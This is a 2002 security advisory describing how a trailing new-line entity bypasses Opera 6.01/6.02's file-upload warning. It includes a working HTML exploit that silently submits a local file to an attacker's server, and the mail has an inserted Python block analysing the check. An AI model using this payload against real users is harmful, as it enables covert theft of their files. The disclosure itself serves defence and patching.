[NT] Opera Allows Reading of Any Local File

From: support@securiteam.com
To: list@securiteam.com
Date: Mon, 27 May 2002 18:31:33 +0200 (CEST)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

  Opera Allows Reading of Any Local File
------------------------------------------------------------------------

SUMMARY

Opera, like all browsers today, supports the <input type="file"> element,
which is a standard method for users to upload files to HTTP servers.
Since the file element is a very security-sensitive element, most web
browsers do not allow its "value" attribute to be set (read only). If it
was possible to assign an arbitrary string to the "value" attribute, an
attacking server could fetch any local file by simply submitting a form
(through scripting or social engineering, if scripting has been disabled).

Opera's approach to the file element is a little different. The "value"
attribute can be set, but before the form it resides in is submitted, a
dialog comes up with the following warning:
"The files listed below have been selected, without your intervention, to
be sent to another computer. Do you want to send these files?"

DETAILS

Vulnerable systems:
 * Opera version 6.01
 * Opera version 6.02

It is possible to bypass the file element's confirmation dialog, which
means an attacker can download any file from an unsuspecting Opera user.

By appending a simple "&#10;" (the HTML entity for the ASCII new-line
character) to the end of the file element's "value" attribute, Opera's
security check is fooled into thinking that no files were assigned.
Therefore, the warning dialog does not come up; Opera simply submits the
form with the file chosen by the attacker.

Surprisingly, versions of Opera prior to 6.01 are not vulnerable to this
attack. Therefore, a change that occurred between version 6.0 and 6.01 is
the culprit. This also means that all of the non-Windows versions are safe
(Opera has not released 6.01 for other platforms yet).
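The mechanism above, worked through in code as an added example (not part of the advisory and not Opera's or GreyMagic's code): the advisory's form is parsed, the "&#10;" entity decodes to a real new-line, and a hypothetical reconstruction of the fooled check (Opera's real code is not shown on this page) is placed beside a hardened check that a browser following Opera's warn-before-submit design would need.

```python
import re
from html.parser import HTMLParser

# The exploit form from the advisory, embedded here as sample input.
EXPLOIT_HTML = """<body onload="document.secForm.submit()">
<form method="post" enctype="multipart/form-data" action="recFile.php"
name="secForm">
<input type="file" name="expFile" value="c:\\test.txt&#10;"
style="visibility:hidden">
</form>
</body>"""

class FileInputCollector(HTMLParser):
    """Collect (name, value) of every <input type="file"> in a document.
    HTMLParser decodes character references in attribute values, so the
    "&#10;" in the source arrives here as a real new-line character."""
    def __init__(self):
        super().__init__()
        self.file_inputs = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "input" and (a.get("type") or "").lower() == "file":
            self.file_inputs.append((a.get("name"), a.get("value") or ""))

def collect_file_inputs(markup):
    parser = FileInputCollector()
    parser.feed(markup)
    parser.close()
    return parser.file_inputs

def files_selected_naive(value):
    """Hypothetical model of the check the advisory describes as fooled (not
    Opera's real code): treat the value as a new-line separated list and look
    only at the last entry, so a trailing LF reads as 'nothing selected'."""
    return value.split("\n")[-1] != ""

def files_selected_hardened(value):
    """Corrected check: strip control characters from every entry and report a
    selection if anything is left, so a trailing new-line cannot skip the dialog."""
    entries = [re.sub(r"[\x00-\x1f\x7f]", "", e).strip() for e in value.split("\n")]
    return any(entries)

def scripted_file_values(markup, check=files_selected_hardened):
    """Names of file inputs whose markup pre-assigns a value that the given
    check treats as a real selection, i.e. the ones that must raise the dialog."""
    return [name for name, value in collect_file_inputs(markup) if check(value)]

if __name__ == "__main__":
    for name, value in collect_file_inputs(EXPLOIT_HTML):
        print(name, repr(value), "naive:", files_selected_naive(value),
              "hardened:", files_selected_hardened(value))
```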

Exploit:
This exploit will automatically transfer the file "c:/test.txt" to an
attacking host, which can handle it using a server-side environment such
as ASP, PHP or other solutions. It does not require any user interaction:

<body onload="document.secForm.submit()">
<form method="post" enctype="multipart/form-data" action="recFile.php"
name="secForm">
<input type="file" name="expFile" value="c:\test.txt&#10;"
style="visibility:hidden">
</form>
</body>

Solution:
Opera was informed on 15 May 2002 and confirmed our findings. A day later,
in the evening of 16 May 2002, Opera informed us that the vulnerability
was fixed and committed to Opera's own version control system.

On 27 May 2002, Opera released version 6.03, which addressed this issue.

Opera has been extremely responsive and quick to understand and patch this
vulnerability. They have shown that they truly do take security seriously.

Demonstration:
Before demonstrating this issue, there are a few things to understand:
 * In order to demonstrate how this vulnerability works, the content of
the file has to be transferred to our server.
 * Files from the demonstration will not be saved on our server under any
circumstances; they will be displayed to you and immediately removed.
 * Please try to use small files (under 50K) in order to test yourself.
There is simply no sense in using large files.
 * An "unencrypted submission" warning dialog may appear because
information is transmitted in an unencrypted manner; this is a standard
dialog for ANY unencrypted form submission and is not directly related to
the vulnerability. If another dialog, regarding the files that were
submitted, does not appear after dismissing this warning, then you are
vulnerable. A potential attacker would simply use SSL to avoid the
"unencrypted submission" dialog.

We put together two proof-of-concept demonstrations:
 <http://sec.greymagic.com/adv/gm001-op/opyank.asp> Simple: displays
properties and contents of "c:/test.txt".
 <http://sec.greymagic.com/adv/gm001-op/opyankadv.html> Advanced: lets the
user pick which file to view, using a simple text element.

ADDITIONAL INFORMATION

The information has been provided by <mailto:security@greymagic.com>
GreyMagic Software.
